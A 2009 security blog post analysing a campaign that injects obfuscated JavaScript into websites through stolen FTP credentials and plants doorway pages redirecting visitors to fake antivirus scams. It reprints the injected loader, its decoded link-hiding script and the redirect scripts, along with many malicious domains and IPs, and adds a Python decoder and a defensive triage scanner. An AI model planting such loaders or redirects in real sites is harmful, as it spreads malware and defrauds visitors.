Sunday, March 8, 2009

Web Poisoning: Massive malware attacks + iframe exploit - 2009

Web Poisoning - Massive SQL injections, XSS attacks,
iframe and obfuscated javascript exploits from RBN

Compromised websites are used to spread rogue antivirus products
such as Antivirus360/2009/2010, MalwareDefender2009, etc.

The consequences for the site owner: banned by search engines, ranking destroyed,
unwanted popups/redirections...

A new web-based threat (drive-by installs) is currently spreading at a rate
of hundreds of sites per day (possibly more).

It started in 2008; detections rose at the end of December 2008
and rose again in March 2009.

Peak detection:

Over 1000 websites in 24 hours
15,000 detected in total (possibly more)

Websites affected: number unknown
Computers affected: 30 million Windows PCs (PandaSecurity)

Number of variants:
7,000 variants of this type of malware over the last year alone

In the wild: Yes

First infection: July/August 2008
Latest infection found: 6 March, 2009

Related:

Scammers making '$15m a month' on fake antivirus
FakeAntivirus PandaSecurity

HostExploit’s Cyber Crime Series
Sinowal Trojan
Sophos - Snickerdoodles and FakeAV
-------------------------------------------------------------------------------------------------------------------

Spreading via FTP (stolen FTP passwords), this malware modifies all
index/main/intro pages by inserting obfuscated JavaScript code.
Because the foothold is a valid FTP credential, cleaning the pages without
changing the password (and disinfecting the machine it was stolen from)
only leads to reinfection.
 
Sample of the malicious code inserted:

function cniw(de,apyi){
  // default: a custom 64-symbol alphabet; a symbol's position is its 6-bit value
  if(!apyi){
    apyi='=rmIqnV*C3MBpA8xSDGE6HTOoe-cQl&PiXjuYK4U'+'k9NL2w1z+;'+'h{7.RyZF(sfbWJ';
  }
  var y;
  var OR='';
  // four symbols -> 24 bits -> three bytes: base64 with a private alphabet
  for(var dew=0;dew<de.length;dew+=4){
    y=(apyi.indexOf(de.charAt(dew))&63)<<18|
      (apyi.indexOf(de.charAt(dew+1))&63)<<12|
      (apyi.indexOf(de.charAt(dew+2))&63)<<6|
      apyi.indexOf(de.charAt(dew+3))&63;
    OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);
  }
  // drop the last 3 bytes (the blob ends in '==' padding) and run the decoded script
  eval(OR.substring(0,OR.length-3));
}
// encoded payload; one string on the page, split here with + at the line breaks
cniw('l4nhCVKjxTDzoyHweTF7'+
  '8RKjBUlh-ODKMmQfQRAh3h2U-Or7CV;Xc4l.oTlKxG3NoOeXQ'+
  'RAh-Or7Cjr7&OrKxG37eOX7BR9Xl4n{oy39Q*SjxjQ98RKjBUlh'+
  '-ODKMml4lTFulVKzcjrL-4;.MmKsCmQ98RKjBUlh-ODKMmlRoOCi'+
  'cTXUem=bCISF8hQ98RKjBUlh-ODKMmlRoOCi-UXLCI7iMVDzoy'+
  'HweTF7B4lKlqH2eT.KcUDm&6KYMm3ye4fjMGYs3hYs-TC1ly3'+
  '9lV6k3R9Z-hF{l*K2eGF+cyA9lVKzcj=bCm3XoUAzc*H7eGCs3h'+
  'Ys-TC1ly39lV6k3R9Z-hF{l*K2eGFR-OA9o4K2-ODFCI7iCUe9QR'+
  'KjcV6j8hQ98RKjBUlh-ODKMmlN&V21QyDFcV61lRKYlViixG=RpI'+
  'ps3hYs-TC1ly39lV6k3R.keRSixG=;8m7hAj9w-VlYMuC.B{q2pG'+
  'wN&V21QyDFcV61lRKYlVis3hYs-TC1ly39lV6k3R9Z-hF{l*K2eG'+
  'F7cy=ixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiU-UXLBUA'+
  '7&T;KB4;KeUSixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiUP'+
  'GQ98RKjBUlh-ODKMmlKl4n2Mn+U-R92lGi9OmQ98hQ98RKjBUlh'+
  '-ODKMmQfByAuQjQL3RK+lIZUME2iCm==');
  
Result:

var ai = document;
ai.write('<scr' + 'ipt language="javascript" type="text/javascript">');
ai.write('function zp(){ ');
ai.write('var zx = 49;');
ai.write('var vsr = (document.getElementById("sy"));');
ai.write('vsr.style.position = "absolute";');
ai.write('vsr.style.visibility = "visible";');
ai.write('vsr.style.width = 603;');
ai.write('zx = 18-26*zx*25/1,1+vsr.style.width;');
ai.write('vsr.style.top = zx+\'px\';');
ai.write('vsr.style.left = zx+\'px\';');
ai.write('}'); ai.write('eval(\'zp()\');');
ai.write('</scr' + 'ipt>');
 * This script simply HIDES the injected links: the element with id "sy"
(the container for the inserted links) is positioned absolutely at
top/left = -31832px (18-26*49*25; the trailing ",1+vsr.style.width" is a
comma expression whose value is discarded), i.e. far off-screen.
Normal visitors never see the links, while search-engine crawlers still index them.
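The decoder above is base64 with a private alphabet. The Python re-implementation below is an added example, not code from the page: it reproduces the cniw() loop but returns the text instead of handing it to eval(), so the payload can be read rather than run. The alphabet is copied from the function; the embedded sample is the first 72 symbols of the blob quoted above, which decode to the start of the document.write loader (the Result listing above shows the same loader with the variable written as ai).

```python
"""Python re-implementation of the cniw() decoder (added example; not code from the page)."""

# The 64-symbol alphabet from the injected function: a symbol's position is its 6-bit value.
CNIW_ALPHABET = ("=rmIqnV*C3MBpA8xSDGE6HTOoe-cQl&PiXjuYK4U"
                 "k9NL2w1z+;"
                 "h{7.RyZF(sfbWJ")

# First 72 symbols (18 groups of 4) of the blob passed to cniw() on the page.
SAMPLE_PREFIX = ("l4nhCVKjxTDzoyHweTF7"
                 "8RKjBUlh-ODKMmQfQRAh3h2U-Or7CV;Xc4l.oTlKxG3NoOeXQ"
                 "RAh")


def alphabet_is_valid(alphabet):
    """A usable alphabet has exactly 64 distinct symbols, one per 6-bit value."""
    return len(alphabet) == 64 and len(set(alphabet)) == 64


def decode_cniw(blob, alphabet=CNIW_ALPHABET):
    """Reproduce the decoding loop of cniw() and return the text instead of eval()ing it.

    Four symbols carry 24 bits and yield three bytes, exactly like base64 with a
    private alphabet. Two JavaScript quirks are mirrored on purpose: a symbol that
    is not in the alphabet has indexOf() == -1, which '& 63' turns into 63, and a
    short final group reads '' (charAt past the end), whose indexOf() is 0.
    """
    out = []
    for i in range(0, len(blob), 4):
        group = blob[i:i + 4]
        vals = [alphabet.find(ch) & 63 for ch in group] + [0] * (4 - len(group))
        y = (vals[0] << 18) | (vals[1] << 12) | (vals[2] << 6) | vals[3]
        out.append(chr((y >> 16) & 255))
        out.append(chr((y >> 8) & 255))
        out.append(chr(y & 255))
    return "".join(out)


def payload_for_eval(blob, alphabet=CNIW_ALPHABET):
    """What the original hands to eval(): the decoded text minus its last 3 bytes,
    because the blob's final group ends in '==' padding."""
    return decode_cniw(blob, alphabet)[:-3]


if __name__ == "__main__":
    # prints: var ib=document;ib.write('<scr'+'ipt language="javascr
    print(decode_cniw(SAMPLE_PREFIX))
```

Swapping the alphabet string is all that is needed for the sister variants of this loader; the loop itself is the standard 4-symbols-to-3-bytes base64 shape, which is also why the "&63)<<18" pattern is a usable signature for it.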
Analysis:

Hundreds or thousands of pages on legitimate domains were compromised: web pages
stuffed with keywords (porn, celebrities, etc.) were added to them
as a means of attracting victims via search-engine results.
 
Different HTML pages (random names, approx. 1000 uploaded per victim site):
   
shar__ackson_xxx.html
independent__escorts_derby.html
chexxxader_fxxed-terri__summers.html
allstar_strxx_poker.html
mike_rowe_nxxxe__pics.html
kexxxxxx__scene.html
 
under different folders (random name, one folder per victim):
 
bow-wzzzzzy
azzn-caxxxxa-uxxirt
men-women-bxxxilders
naxxnxxe-gallery
racxxl-star-amateur
 
The folders with the names below are used:
 
_image/
_images/
_img/
_imgs/
etc...
 
(or inside a normal folder: backup, project, etc.)
 
A complete site:

index.html
map.html
rss.xml (RSS feed with thousands of links pointing to the pages on the victim site)
Approximately 1000 pages per site (victim)

These pages redirect visitors to malicious websites:

www.onlinedetect. com (always active since 2008)
Registrar: ONLINENIC, INC.
http://private.dnsstuff.com/tools/whois.ch?domain=onlinedetect. com&email=on

Almost 10-20 new domains are created every day:

hxxp://QUICKSECURITYEXAMINEONLINE. COM (served for 3 days)

http://www.webnames.ru/scripts/who.pl?domain=
QUICKSECURITYEXAMINEONLINE. com

hxxp://instantprotectionscan . com (served for 4 days)
hxxp://wwwreadright . com
hxxp://stabilityexaminesite . com
hxxp://stabilitysolutionslook . com
hxxp://QUICKRESPONSESAFETY . COM
hxxp://onlinesafetyscan . com
 


Template used:

Sample StabilitySolutionsLook

***************************************************

All redirect to the same IP 94.247.3.3 (Zlkon. lv - Latvia)
http://www.google. com/safebrowsing/diagnostic?site=94.247.3.3

--------------- Google safe browsing report ----------------------
Malicious software includes 9689 adware(s), 9166 trojan(s),
5085 scripting exploit(s).

Oh, sorry: just an update after 10 days.

Malicious software includes 10695 trojan(s), 9689 adware(s),
5259 scripting exploit(s).

Over the past 90 days, 94.247.3.0 appeared to function as an
intermediary for the infection of 671 site(s)

What happened when Google visited sites hosted on this network?

Of the 318 site(s) we tested on this network over the past 90 days, 18 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

The last time Google tested a site on this network was on 2009-03-14,
and the last time suspicious content was found was on 2009-03-14.

Has this network hosted sites acting as intermediaries for further malware
distribution?

Over the past 90 days, we found 18 (update: 13) site(s) on this network that appeared to function as intermediaries for the infection of 2565 (update: 2922) other site(s).

Has this network hosted sites that have distributed malware?

Yes, this network has hosted sites that have distributed malicious software
in the past 90 days. We found 117 site(s) (updated: 122) that infected 9272 (updated: 11243) other site(s).


http://www.google. com/safebrowsing/diagnostic?site=AS:12553

-------------------------------------------------------------------------------------

Example of compromised website:

http://sanstabous.[BLOCKED]com.ar
http://sanstabous.[BLOCKED]com.ar/includes/common/_images/hawaii-asian-escort/
pierced-tounges-xxx.html

http://grzes77.[BLOCKED]webd.pl
http://grzes77.[BLOCKED]webd.pl/zdjecia/_images/teens-illustrated/index.html

http://64.177.[BLOCKED]12.146
http://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/

RSS Example:

hxxp://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/rss.xml


Analysis below:
http://wepawet.iseclab.org/view.php?hash=0b34948b0d01123e5cd1caa0eb318ef5&t=1235086837&type=js


All of these pages uploaded by the bots contain a JavaScript redirection
to onlinedetect. com or related sites (greatstabilitytraceonline. com).

---------------

Similar code (same attack):

window.location = encodeURI("http://www.onlinedetect. com/in.cgi?6"
  + "&tsk=sept-task11-r200-id11-t11-3bpri-al2nd&type=l&seoref="
  + encodeURIComponent(document.referrer)
  + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="
  + encodeURIComponent(document.URL)
  + "&default_keyword=XXX");

and here: hxxp://members.lycos. co.uk/mozila/473.html

<script language="javascript">
var scheme=5;
var default_keyword='';
// alert() displays the decoded string instead of running it;
// the %XX string is one literal on the page, split here with + at %XX boundaries
alert(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%22' +
  '%68%74%74%70%3A%2F%2F%74%72%61%66%66%62%6F%78%2E%63%6F%6D' +
  '%2F%69%6E%2E%63%67%69%3F%22%2B%73%63%68%65%6D%65%2B%22' +
  '%26%73%65%6F%72%65%66%3D%22%2B' +
  '%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28' +
  '%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%72%65%72%29%2B%22%26%22%2B%22' +
  '%70%61%72%61%6D%65%74%65%72%3D%24%6B%65%79%77%6F%72%64' +
  '%26%6B%65%79%77%6F%72%64%3D%24%6B%65%79%77%6F%72%64' +
  '%26%73%65%3D%24%73%65%26%75%72%3D%31' +
  '%26%48%54%54%50%5F%52%45%46%45%52%45%52%3D%22%2B' +
  '%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%6D%65%6E%74%2E%55%52%4C%29%2B%22' +
  '%26%64%65%66%61%75%6C%74%5F%6B%65%79%77%6F%72%64%3D%22%2B' +
  '%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%65%66%61%75%6C%74%5F%6B%65%79%77%6F%72%64%29%3B'));
</script>

Deobfuscated result:

window.location="http://traffbox.com/in.cgi?"+scheme
  +"&seoref="+encodeURIComponent(document.referrer)
  +"&"+"parameter=$keyword&keyword=$keyword&se=$se&ur=1&HTTP_REFERER="
  +encodeURIComponent(document.URL)
  +"&default_keyword="+encodeURIComponent(default_keyword);

Result: traffbox. com/in.cgi?5

<html><head>
<meta http-equiv="REFRESH" content="1; URL='http://gowayscan.com/?uid=12403'">
</head><body>
document moved
<a href="http://gowayscan. com/?uid=12403">
here</a>
</body></html>

Result: gowayscan. com/?uid=12403

HTTP Location header redirection:

hxxp://litescan4. com/?uid=12403


Dates (the tsk/wrk campaign tags embed the month):

tsk=aug-task3-r86-id57-t78-al2nd
tsk=july-task18-r86-id52-t58-obo22j
tsk=julyt20-r19-id54-obo-july11
tsk=sept-task9-r115-id25-t43-ale3nd
tsk=id67-01dec08-r91
tsk=julyt20-r19-id54-obo-july11
wrk=julyt06-r19-id061-z-july29
wrk=augt06-r19-id85-z-aug18
 
Entering these strings in Google reveals tons of sites
(SQL injections, XSS attacks, etc.)

On these sites we can also see some bad links to Google Video
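The doorway-kit layout described above (an _image(s)/_img(s) folder holding a keyword-named sub-folder with roughly 1000 HTML pages and an rss.xml), the obfuscated loader injected into index pages at the top of the post, and the in.cgi redirect with its tsk/wrk campaign tag can all be checked for offline on a suspect web root. The Python script below is an added example, not code from the page: it walks a web root, flags files that carry the 6-bit-shift decoder feeding eval(), lists doorway kits, and parses each redirect URL for host, scheme number and tsk tag. The sample web root it builds in a temporary directory is constructed for the example; the regexes, folder names and thresholds are assumptions drawn from the samples quoted on the page and will need adjusting for a real incident.

```python
"""Offline triage of a web root for the artefacts described on this page (added example)."""
import os
import re
import tempfile
from urllib.parse import urlsplit, parse_qs

# Folder names the kits hide under (from the page); real image folders are rarely named so.
DOORWAY_DIRS = {"_image", "_images", "_img", "_imgs"}
# The cniw()-style loader rebuilds 24 bits from four 6-bit symbols ("&63)<<18") and
# hands the text to eval(); requiring both keeps ordinary scripts from matching.
SIX_BIT_DECODER = re.compile(r"&\s*63\s*\)\s*<<\s*18")
EVAL_CALL = re.compile(r"\beval\s*\(")
# Doorway redirect as quoted on the page: window.location = encodeURI("http://.../in.cgi?6&tsk=...
TDS_REDIRECT = re.compile(r'window\.location\s*=\s*encodeURI\(\s*"([^"]+)"')
PAGE_EXT = (".html", ".htm", ".php", ".js")


def _read(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def _rel(root, path):
    return os.path.relpath(path, root).replace(os.sep, "/")


def find_injected_loaders(root):
    """Relative paths of files carrying the 6-bit decoder plus eval()."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower().endswith(PAGE_EXT):
                text = _read(full)
                if SIX_BIT_DECODER.search(text) and EVAL_CALL.search(text):
                    hits.append(_rel(root, full))
    return sorted(hits)


def find_doorway_kits(root, min_pages=3):
    """Sub-folders of a fake image folder holding many .html pages and/or an rss.xml."""
    kits = []
    for dirpath, dirs, _files in os.walk(root):
        if os.path.basename(dirpath) not in DOORWAY_DIRS:
            continue
        for sub in dirs:
            kit = os.path.join(dirpath, sub)
            names = os.listdir(kit)
            pages = sum(1 for n in names if n.lower().endswith(".html"))
            has_rss = "rss.xml" in names
            if has_rss or pages >= min_pages:
                kits.append({"dir": _rel(root, kit), "pages": pages, "has_rss": has_rss})
    return sorted(kits, key=lambda k: k["dir"])


def extract_tds_targets(path):
    """Host, scheme number and campaign tag (tsk/wrk) of every redirect in one page."""
    found = []
    for url in TDS_REDIRECT.findall(_read(path)):
        parts = urlsplit(url)
        first = parts.query.split("&", 1)[0]   # "in.cgi?6&tsk=..." -> "6"
        qs = parse_qs(parts.query)               # the bare "6" has no '=' and is skipped here
        found.append({"host": parts.hostname, "path": parts.path,
                      "scheme": first if first.isdigit() else None,
                      "tsk": (qs.get("tsk") or qs.get("wrk") or [None])[0]})
    return found


def triage(root):
    """One pass over the web root: injected loaders, doorway kits and their TDS targets."""
    doorways = find_doorway_kits(root)
    tds = []
    for kit in doorways:
        kit_dir = os.path.join(root, kit["dir"])
        for name in sorted(os.listdir(kit_dir)):
            if name.lower().endswith(".html"):
                tds.extend(extract_tds_targets(os.path.join(kit_dir, name)))
    return {"loaders": find_injected_loaders(root), "doorways": doorways, "tds": tds}


# --- constructed sample web root (fixture for this example, not a real compromise) ---
LOADER_FIXTURE = ("<script>function cniw(de,apyi){var y,OR='';for(var i=0;i<de.length;i+=4){"
                  "y=(apyi.indexOf(de.charAt(i))&63)<<18|(apyi.indexOf(de.charAt(i+1))&63)<<12;"
                  "OR+=String.fromCharCode((y&16711680)>>16);}eval(OR);}cniw('l4nh','=rmI');</script>")
DOORWAY_FIXTURE = ('<script>window.location = encodeURI("http://www.onlinedetect.com/in.cgi?6'
                   '&tsk=sept-task11-r200-id11-t11-3bpri-al2nd&type=l&seoref=" + '
                   'encodeURIComponent(document.referrer));</script>')


def build_sample_site():
    """Write a small web root with one injected index page and one doorway kit; return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")

    def put(rel, body):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

    put("index.html", "<html><body>Welcome</body>" + LOADER_FIXTURE + "</html>")
    put("about.html", "<html><script>eval('1+1')</script></html>")   # eval() alone is not a hit
    put("images/gallery.html", "<html>real image folder, no underscore</html>")
    kit = "templates/_images/constructed-kit/"
    for i in range(5):
        put(kit + "keyword_page_%d.html" % i, "<html>" + DOORWAY_FIXTURE + "</html>")
    put(kit + "rss.xml", "<rss><channel><item><link>x</link></item></channel></rss>")
    return root


if __name__ == "__main__":
    print(triage(build_sample_site()))
```

Run it against a copy of the web root taken from the FTP account, not the live server, and compare the tsk values it extracts with the dated tags listed above: they tell you which campaign wave hit the site and, together with the FTP log, roughly when the credential was first used.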

****************************************
****************************************
****************************************

March UPDATE

Following 0day33hours. com and onlinedetect. com
redirected me to some
new sites promoting InternetAntivirusPro.
The domain list will be published soon.
Here are a few of them; some are not used,
some suspended, etc.

Some have this common message:

Your computer remains infected by viruses!
They can cause data loss and file
damages and need to be cured as soon as possible.
Return to System
Security and download it secure to your PC

Windows is scanning your system for threats.
The scanning is provided by
our official partner Internet Antivirus Pro.
Please refrain from closing the window until the
scanning is finished.
We highly recommend you to install the full version
of Internet Antivirus
Pro scanner to monitor your PC for threats and
on-time security system updates.

Please note that Spyware is highly malicious for
your PC information privacy.
If you want to install the full version, please
click "Ok", wait for the page to load, start the
installation process and follow the instructions.
If you want to wait for scanning results to appear,
please click "Cancel".
After Internet Antivirus Pro is installed, you can
close the scanning window and remove Spyware
from your computer.

Serious security and privacy threats found on your
computer.
It may damage your files or steal your personal and
financial information.
Click "OK" to start downloading CRITICAL
security software update.

Your computer is running slower than normal,
maybe it is infected with Viruses, Adware
or Spyware.
RapidAntivirus will perform a quick and
completely FREE scan of your system for
malicious software.
Download RapidAntivirus for FREE now!.

(onlinescanweb. com)

Some Title:

My Computer
My computer Online Scan
Internet Security is important
Internet Antivirus Pro: best protection for Your privacy

Windows Security Center
RapidAntivirus
Virus Scan in Progress

Some URLs:

in.php
hitin.php
in.cgi?{3-6} (traffic management - avertlabs - Inside the malicious traffic)
cki.php?uid=keyin
?uid=keyin {/22/?uid=keyin - /26/?uid=keyin}

Some common files:

/script_en.js
/files/brand_constants.js
/files/text_constants_en.js
/files/this_landing.css
/files/domFunction.js
/files/startafter.js
/files/mouse_block.js
/files/unic_scripts.js
/files/pre_load.css
/common/destrub.js
/common/stata.js
/common/build/yahoo-dom-event/yahoo-dom-event.js
/installinfo/3/style.css
/nag/1/?uid=144&n=nag&install=1
/cki.php?uid=keyin
/download/install.php


Site Samples:









HTML detected as:

JS_FAKEALERT.AK

One is detected as Mal_FakeAV6
Two are detected as HTML_FAKEAV.ALO

destrub.js detected as

JS_DLOADER.UGD
JS_DLOADER.WJJ

*********************
Template RapidAntivirus (hxxp://onlinescanweb. com)

Template RapidAntivirus from onlinescanweb. com

*********************
Template SystemSecurity (hxxp://systemsecurityline. com)



*********************
File downloaded install.exe

Detected as:

Cryp_FakeAV-9
Cryp_FakeAV-10
Cryp_FakeAV-11

Different variants:

TROJ_INTERNETA.K
TROJ_AGENT.ANOE
TROJ_FAKEAV.ALS
TROJ_FAKEAV.AHJ
TROJ_FAKEAV.BML
TROJ_FAKALER.VO

IAInstall.exe is detected as:

TROJ_INTERNETA.H

Alias: Winwebsecurity

*********************

DCC48B8D-50BC-460B-B6D6-35E4E9BF258D

File downloaded SystemSecurity.exe or Setup.exe - VT

Detected as:

TROJ_AGENT.ANEM
TROJ_FAKEAV.AND
TROJ_RENOS.AVI



 

Some related domains: 69.64.33.242

Same template SystemSecurity:

micro-ms-antivir. com

On the same server we also have other fake AV sites.

Reverse IP: 135 other sites hosted on this server.

CCleaner template and some others:
 
2009system-cleaner. com
advanced-anti-virus. com
advanced-antivirus. com
antimalwarewarrior2009. com
antispyware-solutions. com
antiviral-softtools. com
antivirus-buy1. com
antivirus-cs2. com
antivirus-cs3. com
antivirus-cs4. com
antivirus-cs5. com
antivirus-cs6. com
antivirus-cs7. com
antivirus-cs8. com
antivirus-cs9. com
antivirus-cs10. com
antivirus-cs11. com
antivirus-cs12. com
antivirus-cs13. com
antivirus-cs14. com
antivirus-cs15. com
antivirusmaster2009. com
e-spy-punisher. com
fight-viruses-corp. com
kicks-mall. com
kill-adware-soft. com
killallspywares2009. com
malware-preventer. com
malware-remover2008. com
micro-adware-cops. com
micro-antivirus2008. com
spy-cops-2009. com
spy-re-mover. com
spy-terminators. com
spyware-remover-inc. com
superantivirus2009. com
sys-antispy2009. com
vis-antispy2008. com
windows-antispy2008. com
 
 

Watches
 
era-mall. com
luxury-mall. com
mypharmshop. com
premium-watches. com
watches-vendor. com
multibrand-shop. com
 
 

Pharma
 
hq-pharmacy1. com
hq-pharmacy2. com
mypharmshop. com
 
 

eCommerce
 
web-checkout1. com 
 

Whois details show that "the domain owner"
also has 24 other domains.

DNS Servers:

NS1.AAA-NAMESERVER. com
NS2.AAA-NAMESERVER. com

Domain used:

***********************************************
Domain served...

Registrar: BIZCN. com, INC.
  
0day33hours. com
moxnatko. com(SUSPENDED)
 

Registrar: REGTIME LTD. (webnames.ru)

(report links attached to each domain on the page: ThreatExpert, Taste, AV vendors, Google, etc.)

beststabilityscan. com  (Reports; Symantec; VirusTotal)
dynamicstabilityexamine. com  (Report; Reports; Google; Google)
dynamicstabilityread. com  (Reports; Google; Google)
esnetscanonline.com  (Reports; Symantec)
fastdirectdownloadserver. com  (Report; Winweb Security)
faststabilityexamine. com  (Reports; Google)
fuckmoneycash. com  (Report; IP: 209.44.126.14)
greatstabilityscanonline. com  (Google; FireEye)
greatstabilitytraceonline. com  (Reports; Google; Google)
instantsecurityscan. com  (Report; Reports; Google)
internetexamine. com  (Symantec)
internetsecurityexamine. com  (Reports)
netsecurityonline. com  (McAfee)
networkstabilityexamine. com  (Google; Symantec)
onlineprotectionscan. com  (Google)
onlinesafetyscan. com  (Google)
onlinesecuredownload. com  (Report)
onlinestabilityscanada. com
onlinestabilityexamine. com
onlinestabilityguide. com  (Reports)
onlinestabilityscan. com
onlinestabilitysite. com
outsthehit. com  (Report)
protectionread. com  (Report)
quickresponsesafety. com  (Google)
quicksecurityexamineonline. com
quickstabilityscan. com  (Report)
quicksecurityskim. com  (Report)
readysecurityscan. com  (Google)
safetyexamine. com
safetyinternetscan. com
safetyonlinescan. com
safetyread. com
safetywwwscan. com
scansecurityonline. com
scanstabilityavailable. com
scanstabilityinternet. com
scanstabilityonline. com  (Report)
scanworldonline. com
securewebscan. com
securithyonsite. com
stabilityscanweb. com  (Report)
stabilitysolutionslook. com  (Report)
stabilityskim. com
stabilitytraceweb. com  (Report)
thestabilityinternetworld. com  (Report)
safesoftwaretransfer. com  (Report)
scansecurityonline. com  (Report)
scanstabilityonline. com  (Report)
scanusonline. com  (Report)
scanworldguide. com  (Report)
securecrtdownload. com  (Report)
securefilecourier. com  (Report)
securefileservices. com  (Report)
secureshelldownload. com  (Report)
securedownloaddirect. com  (Report)
securedownloadsoftware. com  (Report)
securetransferonline. com  (Report)
securityonlineread. com  (Symantec)
securityonlinescan. com
securityscanworld. com  (Report)
serverfastdownload. com  (Report)
stabilityaudit. com
stabilityscandirect. com  (Reports)
stabilityscanweb. com
stabilityexamineguide. com  (Report)
stabilityexamineonline. com
stabilityexaminesite.  com
stabilityinternetearthguide. com
stabilityinternetglobalonline. com  (411-spyware)
stabilityinternetscan. com
stabilityinternetworld. com
stabilitynet. com
stabilityonline. com
stabilityonlinedirect. com
stabilityread. com
stabilityseeonline. com
stabilityscan. com  (FireEye)
stabilityscandirect. com
stabilitysolutionslook. com  (Symantec; Google)
stabilitytrace. com
stabilitytraceonline. com  (Report)
stabilitytraceweb. com
stabilityscanavailable. com  (Report)
stabilityscanonline. com
stabilityscanweb. com
superstabilityread. com  (McAfee)
systemsecurityonline. com  (Report, 2, 3; Reports; Symantec; McAfee)
swiftsafetyexamine. com
thesafedownload. com  (Report)
thesecuredownload. com  (Report)
thesecuretransfer. com  (Report)
thestabilityscan. com
thestabilityweb. com
thestabilityinternetworld. com
websafetyscan. com
websecurityexamine. com
webprotectionswipe. com  (Report)
webreadon. com  (Report)
winwebsecurity. com  (Report)
wwwexamine. com  (Report)
wwwreadright. com
wwwsafeexamine. com
wwwsecurityexamine. com  (Report)
wwwsecurityread.com
wwwstabilityscan. com
wwwmobilereads. com  (Report)
yourstabilityscan. com


Domains used for redirections (previous IP: 69.41.182.12, current IP: 92.62.101.122):

acousticnail.cn  
allradiohits. com  
bankinggolf.cn  
buyyourhomes. com  
designroots.cn  
drawingstyle.cn  
housedomainname.cn   
musicdomainer.cn  
nicescores.cn  
oceandealer.cn  
partsocean.cn  
peopleopera.cn  
rainfinish.cn  
travets.cn  
vitamingood.cn  
websiteflower.cn  
worksean.cn  

Registrar: PUBLICDOMAINREGISTRY.com
   
Some domains are using the DNS below.
   
bestjetsblog. com (SUSPENDED) 
buyyourhomes. com(SUSPENDED) 
detectspywares.info(SUSPENDED) 
extrasdiscount.net(SUSPENDED) 
funbookclub.net(SUSPENDED) 
hadjhadj.info(SUSPENDED) 
goldmagicclub. com(SUSPENDED) 
mediamiddle.net(SUSPENDED) 
movieextrasworld. com(SUSPENDED) 
providesite. com(SUSPENDED) 
stocktradeshop.net(SUSPENDED) 
theyourlife. com(SUSPENDED) 
yourcollectorcar.net(SUSPENDED) 
   
Sponsoring Registrar: 厦门华融盛世网络有限公司
Translated to:Xiamen Huarong Spirit Network Limited
   
Registration Service Provided By: VIVIDS MEDIA GMBH
   
findcommon. com  
 
 
----------------------------------------------------------------------

Domains used to analyse traffic from compromised websites:

(UPDATE: DNS Suspended - Site are not available - 69.41.182.12)
(UPDATE: DNS Updated - Now moving to Starline in Estonia - 92.62.101.122)
(UPDATE:
Name Server:ns1.opa-opa-nixuya. net
Name Server:ns2.opa-opa-nixuya. net
Name Server:ns1.travets. cn
Name Server:ns2.travets. cn
)

vitamingood. cn (registered by REGTIME. LTD - hosted by webnames.ru)
peopleopera.cn (registered by REGTIME. LTD - hosted by webnames.ru)
nicescores.cn (registered by REGTIME. LTD - hosted by webnames.ru)
buyyourhomes. com (registered by REGTIME. LTD - hosted by webnames.ru)

using the following DNS: 69.41.182.12/69.41.182.13 (800hosting.net - US)

UPDATE (DNS SUSPENDED)

hxxp://ns1.bestjetsblog. com
hxxp://ns1.extrasdiscount.net
hxxp://movieextrasworld. com
hxxp://NS1.FINDCOMMON. com
NS1.GOLDMAGICCLUB. com (parked at Sedo)
hxxp://NS1.MEDIAMIDDLE.NET
hxxp://ns1.funbookclub.net
hxxp://NS1.PROVIDESITE. com
hxxp://NS1.STOCKTRADESHOP.NET
hxxp://NS1.THEYOURLIFE. com
hxxp://NS1.THECLUBGOLF.NET
 

94.247.3.3  (ThreatExpert; Symantec)
   
internetsafetyskim.com  
safetyexamine. com  
securityscandirect. com  
wwwsecurityread.com  
   
hs.3-3.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
 

94.247.3.41  (ThreatExpert; Symantec)
   
avpaymentpro. com  
cokiran. com  
iavpaymentpro. com  
go-scan-pro. com  (Report)
gonewscan. com  (Report)
goscanweb. com  (Report)
gosscan. com  
ia-payment-pro. com  
ia-scanner-pro. com  
ia-scannerpro. com  
internet-antivirus-pro. com   
livestopbadware. com  
stased. com  
mysscan. com  
websscan. com  
 
hs.3-41.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.249.3.40  
   
fast-antimalware-scan. com  (Continue here)
 
Netcraft
 
hs.3-40.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.3.42  (ThreatExpert; Symantec; VirusTotal)
    
ia-payment. com   
ia-scanpro. com   
goscan-pro.com   
    
 
hs.3-42.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.3.74  (ThreatExpert; Symantec; VirusTotal)
    
instantsecurityscanworld. com   
thestabilityscan. com  (Report)
yourstabilityscan. com  (Report)
safetyscanworld.com  (Report)
stabilityscandirect. com  (Report)
webnetsafety.com  (Report)
webstabilityscan. com  (Report; Report; Report)
    
Netcraft
 
hs.3-74.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.84 Trend Micro
   
files.msas2009dl. com  (Trend Micro: TROJ_FAKEAV.AID, TROJ_FAKEAV.GDS, TROJ_DLOAD.PG, TROJ_FAKEAV.AIN)
addantivirus. com  
antiviruscheckout. com  
   
hs.2-84.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.133  (ThreatExpert)
   
int.msproreport1. com  (PE_VIRUT)
int.msproreport2. com  
Related: irc.zief.[blocked]pl  
   
